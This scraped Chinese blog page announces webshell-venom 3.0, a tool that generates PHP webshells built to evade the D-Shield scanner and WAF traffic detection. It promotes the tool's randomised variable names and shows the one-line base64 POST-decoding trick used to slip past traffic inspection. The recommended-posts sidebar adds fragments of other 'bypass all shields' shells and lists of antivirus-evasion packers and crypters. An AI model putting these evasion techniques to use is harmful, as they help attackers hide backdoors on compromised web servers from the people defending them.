一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6

最新推荐文章于 2024-06-20 11:50:51 发布
最新推荐文章于 2024-06-20 11:50:51 发布
阅读量1.7k 收藏 2
点赞数
个人星球:https://yzddmr6.tk/zsxq/
本文链接:https://blog.csdn.net/qq_43147039/article/details/103161193
版权

前言

我承诺过300个星后放出3.0

项目地址:

https://github.com/yzddmr6/webshell-venom

webshell-venom 3.0 更新特点:

1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加

2. 变量全员随机化,不再有固定的变量名称

3. 增加流量传输编码方式并且兼容原版

4. 免杀依旧,自己扫两遍就知道了

流量编码原理及使用方式:

看了很多文章甚至包括蚁剑的编码器demo里面都是用一些特定的shell来base64或者hex或者gzin的方式来绕过各种waf的流量检测

但是问题就是不兼容,麻烦,还要上不同的马

并且不好做维护,因为你的特定shell一旦成为已知样本后就相当于完全gg

3.0就解决了这个问题

其实原理很简单,就是如下的一行代码:

isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];

如果存在id这个get的参数就把post的数据base64解密一遍

否则就直接传参

也就是说我们只要使用的时候不加id这个参数就能像一般的shell使用

需要过流量检测的时候就加个id=xxx

后面的xxx不固定,也是为了增加随机化

使用实例

最低0.47元/天 解锁文章
yzddMr6
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
webshell-venom 3.2 :D盾无压力 ——yzddMr6
yzddMr6的博客
11-07 2164
前言 感谢大家对webshell-venom的支持 星球自开启以来已经源源不断有各路大佬加入 并且一起交流了很多的思路跟想法 为了不辜负大家的期望 自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更 项目在今天也达到了700个星 image 所以特地推出webshell-venom 3.2版本 webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商...
webshell-venom-master一些
04-13
9. **源码审计**:由于Webshell Venom Master是开源的,可以进行源码审计,理解技术的实现细节,这对于开发更智能的安全解决方案和提升安全意识非常有价值。 总的来说,Webshell Venom Master是一个宝贵的教育...
一个简单内网渗透工具,(附赠零基础入门学习资料)
分享Python知识
10-05 142
一个简单内网渗透工具,(附赠零基础入门学习资料)
白帽子如何快速挖到人生的第一个漏洞、购物站点挖掘商城漏洞
最新发布
韩束一叶子
06-20 930
可能你的webshell会被掉?这里推荐 Github上的一个项目 ——》
强大工具venom实现(支持安卓、Windows、mac、linux)
热门推荐
钻石
04-15 1万+
下载安装venom GitHub项目地址:https://github.com/r00t-3xp10it/venom 个人百度云: git clone https://github.com/r00t-3xp10it/venom.git 我下载比较慢,翻墙后才快点 安装venom cd venom-master/aux ./setup.py...
简单快捷的 CS 一插件 CSx3Ldr
yutianovo的博客
02-20 682
Cobalt Strike插件
[脚本编程] 过云盾、D盾各种盾shell
weixin_30344795的博客
07-08 655
作者: dean <?php //过云盾、D盾各种盾shell $id = $_GET['id']; //debug echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):''; $s = ''; foreach(array($id) as $v){ $s.=$v;...
D盾-webshell检测必备工具
07-09
D盾的功能比较强大, 最常见使用方式包括如下功能:1、查webshell,隔离可疑文件;2、端口进程查看、base64解码以及克隆账号检测等辅助工具;3、文件监控。第一个是D盾的主要功能,后面功能是D盾的辅助功能,但是...
webshell-dictionary-master 上千个webshell合集
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后...
new.bypass_bypass_NEW__webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW__webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP Webshell。Webshell通常被黑客用于远程...
Behinder-v3.0-Beta-9.zip
08-04
**冰蝎Behinder v3.0 Beta 9:动态二进制加密网站管理客户端** 冰蝎(Behinder)是一款在网络安全领域中广为人知的Webshell管理工具,它以其独特的动态二进制加密技术,为管理员提供了一种安全、隐蔽的方式来远程...
D盾网站源码后门木马检测工具
11-07
D盾网站源码后门木马检测工具
四引擎
06-18
360和金山(一),绝对可用,但是不了小红伞...
万能加壳工具
04-02
实现多种加壳,支持EXE ,DLL 类文件的加壳,压缩自身体积
易语言一,过360. (加壳)
10-21
Esprotect3.9.exe 易语言一,过360. (加壳)
工具箱 简体中文版
02-24
辅助 ┍PE+ ┝MyCCL ┝MaskPE ┝冰枫文件防火墙 ┝AVFucker ┝AV Devil ┝ToPo ┝CodeCaver ┝Anti Kaspersky ┝TK.Loader ┝INSTDRV ┝DriverLoader ┝vmprotect ┕VBExplorer 保护壳 ┍BepGui ┝Cryptor ┝PolyBox ┝ASProtect ┝Punisher 汉化版 ┝ACStripper ┝PE加密 ┝Daemon Crypt ┝nsAnti CracKed ┝RPolyCrypt ┝Goat's PE Mutilator ┝Unknown Protect ┕EXE Stealth 压缩壳 ┍堀北压缩 ┝Minkecn ┝WinUpack ┝petgui_CHS ┝蚂蚁压缩工具 ┝超级加壳工具 ┝Nspack ┝FSG ┝GHF Protector ┝dePack ┝G!X Protector ┕eXPressor 花指令 ┍wrsky ┝防精灵 ┝花指令生成器 ┝超级加花器 ┝main ┝木马疫器 ┝上兴应用程序加壳 ┝冰枫文件加密器 ┝木马保护器 ┝8way ┝花指令添加器 ┝EXE Evil ┝木马彩衣 ┝F ake Ninja ┕━━━━━━━━━━━
weevely的webshell分析以及冰蝎/蚁剑-PHP版
yggcwhat
05-02 2063
weevely的webshell分析以及冰蝎/蚁剑-PHP版
过d盾asp webshell+冰蝎马探讨
goddemon
07-19 2261
正文asp的手法其实也蛮多的个人理解其实核心就是混淆+改变执行顺序啥的。对于asp而言,前者的利用特征这些进行绕后者就是利用函数数组+类的手法个人后者的手法用的最多一样吧这里先扔2个bypass的小马。...
Metasploit 之 webshell 提权
收集盒 Book box
08-04 1805
本文所涉及的方法只能在已授权的机器上做测试。     首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell
webshell
10-17
我理解你的问题是如何编写一个的 webshell。这是一个非常敏感的话题,因为 webshell 的使用可能会导致安全漏洞和数据泄露。因此,我不会提供任何有关编写 webshell 的具体指导。相反,我可以给你一些建议,以帮助你更好地保护你的网站和服务器。 首先,确保你的服务器和网站都有最新的安全补丁和更新。这可以帮助防止已知的漏洞被利用。 其次,使用强密码和多因素身份验证来保护你的服务器和网站。这可以防止未经授权的访问。 最后,定期审查你的服务器和网站,以查找任何异常活动或潜在的安全漏洞。如果你发现任何问题,立即采取措施来修复它们。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值